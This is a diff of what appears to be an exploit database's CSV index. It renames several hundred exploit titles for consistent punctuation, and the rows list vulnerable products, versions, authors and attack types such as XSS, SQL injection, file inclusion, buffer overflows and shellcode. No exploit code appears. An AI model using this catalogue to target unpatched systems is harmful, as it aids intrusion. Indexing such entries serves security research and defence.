+37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin Cross Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat 'url' Parameter Cross Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 +37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 37486,platforms/php/webapps/37486.txt,"sflog! 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service",2012-07-06,IOactive,multiple,dos,0 37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 -37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0 +37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0 37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Inject",2015-07-05,Vulnerability-Lab,ios,webapps,0 @@ -33849,14 +33849,14 @@ id,file,description,date,author,platform,type,port 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0 37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 -37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection",2012-06-17,snup,php,webapps,0 +37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross-Site Scripting and SQL Injection",2012-06-17,snup,php,webapps,0 37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection",2012-07-15,ToXiC,php,webapps,0 37503,platforms/php/webapps/37503.txt,"Event Calender PHP Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 -37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 +37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 -37507,platforms/php/webapps/37507.txt,"web@all 'name' Parameter Cross Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 +37507,platforms/php/webapps/37507.txt,"web@all 'name' Parameter Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 37508,platforms/php/webapps/37508.txt,"Rama Zeiten CMS 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps,0 37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 37510,platforms/windows/remote/37510.c,"Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution",2012-06-26,"Moshe Zioni",windows,remote,0 @@ -33886,37 +33886,37 @@ id,file,description,date,author,platform,type,port 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0 -37539,platforms/php/webapps/37539.txt,"REDAXO 'subpage' Parameter Cross Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 +37539,platforms/php/webapps/37539.txt,"REDAXO 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0 37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI Redirection",2012-07-29,"Aung Khant",php,webapps,0 -37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 +37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0 37550,platforms/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps,0 -37551,platforms/php/webapps/37551.txt,"phpBB Multiple SQL Injection",2012-07-28,HauntIT,php,webapps,0 -37552,platforms/php/webapps/37552.txt,"JW Player 'playerready' Parameter Cross Site Scripting",2012-07-29,MustLive,php,webapps,0 +37551,platforms/php/webapps/37551.txt,"phpBB - Multiple SQL Injection",2012-07-28,HauntIT,php,webapps,0 +37552,platforms/php/webapps/37552.txt,"JW Player 'playerready' Parameter Cross-Site Scripting",2012-07-29,MustLive,php,webapps,0 37553,platforms/php/webapps/37553.txt,"eNdonesia 'cid' Parameter SQL Injection",2012-07-29,Crim3R,php,webapps,0 37554,platforms/php/webapps/37554.txt,"Limny 'index.php' Multiple SQL Injection",2012-07-31,L0n3ly-H34rT,php,webapps,0 37555,platforms/java/webapps/37555.txt,"ManageEngine Applications Manager Multiple SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 -37556,platforms/php/webapps/37556.txt,"Distimo Monitor Multiple Cross Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 -37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager Multiple Cross Site Scripting and SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 +37556,platforms/php/webapps/37556.txt,"Distimo Monitor Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 +37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager Multiple Cross-Site Scripting and SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash PoC",2015-07-10,"Rahul Pratap Singh",windows,dos,0 37559,platforms/php/webapps/37559.txt,"WordPress CP Image Store with Slideshow Plugin 1.0.5 Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37560,platforms/php/webapps/37560.txt,"WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37568,platforms/windows/dos/37568.pl,"VLC Media Player '.3gp' File Divide-By-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 -37569,platforms/multiple/webapps/37569.txt,"ntop 'arbfile' Parameter Cross Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 +37569,platforms/multiple/webapps/37569.txt,"ntop 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 -37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 -37572,platforms/php/webapps/37572.txt,"Elefant CMS 'id' Parameter Cross Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 -37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 +37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 +37572,platforms/php/webapps/37572.txt,"Elefant CMS 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 +37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 37575,platforms/php/webapps/37575.txt,"Joomla! 'com_photo' module Multiple SQL Injection",2012-08-06,"Chokri Ben Achor",php,webapps,0 37576,platforms/linux/remote/37576.cpp,"Alligra Calligra Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0 -37577,platforms/asp/webapps/37577.txt,"PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0 +37577,platforms/asp/webapps/37577.txt,"PolarisCMS 'WebForm_OnSubmit()' Function Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0 37578,platforms/php/webapps/37578.txt,"Open Constructor users/users.php keyword Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37579,platforms/php/webapps/37579.txt,"Open Constructor data/file/edit.php result Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37580,platforms/php/webapps/37580.txt,"Open Constructor confirm.php q Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 @@ -33928,7 +33928,7 @@ id,file,description,date,author,platform,type,port 37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 -37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 +37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross-Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection",2012-08-08,G-B,php,webapps,0 37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80 @@ -33964,29 +33964,29 @@ id,file,description,date,author,platform,type,port 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0 37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF",2015-07-17,"Tom Adams",php,webapps,80 -37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-09,"Yakir Wizman",php,webapps,0 +37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injection / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0 37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 -37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 -37633,platforms/php/webapps/37633.txt,"mIRC 'projects.php' Cross Site Scripting",2012-08-10,TayfunBasoglu,php,webapps,0 -37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Inclusion",2012-08-11,L0n3ly-H34rT,php,webapps,0 +37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 +37633,platforms/php/webapps/37633.txt,"mIRC 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,php,webapps,0 +37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion",2012-08-11,L0n3ly-H34rT,php,webapps,0 37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps,0 -37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme - SQL Injection / Cross Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 +37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps,0 -37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 +37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0 -37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 -37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross Site Scripting",2012-08-18,"Stefan Schurtz",php,webapps,0 -37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 Multiple Security Vulnerabilities",2012-08-27,anonymous,php,webapps,0 -37644,platforms/php/webapps/37644.txt,"Jara 1.6 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 -37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 -37646,platforms/php/webapps/37646.txt,"Banana Dance Cross Site Scripting and SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0 +37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 +37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",php,webapps,0 +37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Security Vulnerabilities",2012-08-27,anonymous,php,webapps,0 +37644,platforms/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 +37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 +37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0 37647,platforms/multiple/remote/37647.txt,"Apache Struts2 Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0 37648,platforms/php/webapps/37648.txt,"Joomla! CiviCRM Component Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0 -37649,platforms/php/webapps/37649.html,"SiNG cms 'password.php' Cross Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 +37649,platforms/php/webapps/37649.html,"SiNG cms 'password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 -37651,platforms/php/webapps/37651.html,"Monstra Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 -37652,platforms/php/webapps/37652.txt,"KindEditor 'name' Parameter Cross Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 +37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 +37652,platforms/php/webapps/37652.txt,"KindEditor 'name' Parameter Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 @@ -34002,35 +34002,35 @@ id,file,description,date,author,platform,type,port 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 -37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 -37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting",2012-08-29,MustLive,php,webapps,0 +37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 +37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos,0 37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 -37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 -37677,platforms/php/webapps/37677.txt,"WordPress Finder 'order' Parameter Cross Site Scripting",2012-08-25,Crim3R,php,webapps,0 +37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 +37677,platforms/php/webapps/37677.txt,"WordPress Finder 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 -37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 -37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host 'users.php' Cross Site Scripting",2012-08-25,Explo!ter,php,webapps,0 +37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 +37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps,0 37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 -37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 -37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 +37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 +37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",xml,dos,0 37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - CSRF",2015-07-24,hyp3rlinx,multiple,webapps,0 -37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting",2012-08-30,HauntIT,php,webapps,0 +37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross-Site Scripting",2012-08-30,HauntIT,php,webapps,0 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection",2012-08-30,Crim3R,asp,webapps,0 -37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 +37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Inclusion",2012-09-03,AkaStep,php,webapps,0 37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection",2012-09-04,AkaStep,php,webapps,0 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 -37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 -37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0 +37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 +37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross-Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0 37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 -37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 +37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent XSS / Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0 @@ -34081,8 +34081,8 @@ id,file,description,date,author,platform,type,port 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37755,platforms/windows/local/37755.c,"Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 -37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting",2012-03-12,K1P0D,multiple,remote,0 -37948,platforms/php/webapps/37948.txt,"WordPress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 +37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 +37948,platforms/php/webapps/37948.txt,"WordPress Slideshow Plugin Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote,0 37950,platforms/php/webapps/37950.txt,"jCore /admin/index.php path Parameter XSS",2012-10-17,"High-Tech Bridge",php,webapps,0 37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 @@ -34090,7 +34090,7 @@ id,file,description,date,author,platform,type,port 37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0 37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0 37760,platforms/windows/local/37760.rb,"PDF Shaper 3.5 - Buffer Overflow (Metasploit)",2015-08-12,metacom,windows,local,0 -37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 +37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,Un_N0n,windows,dos,0 37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 @@ -34108,19 +34108,19 @@ 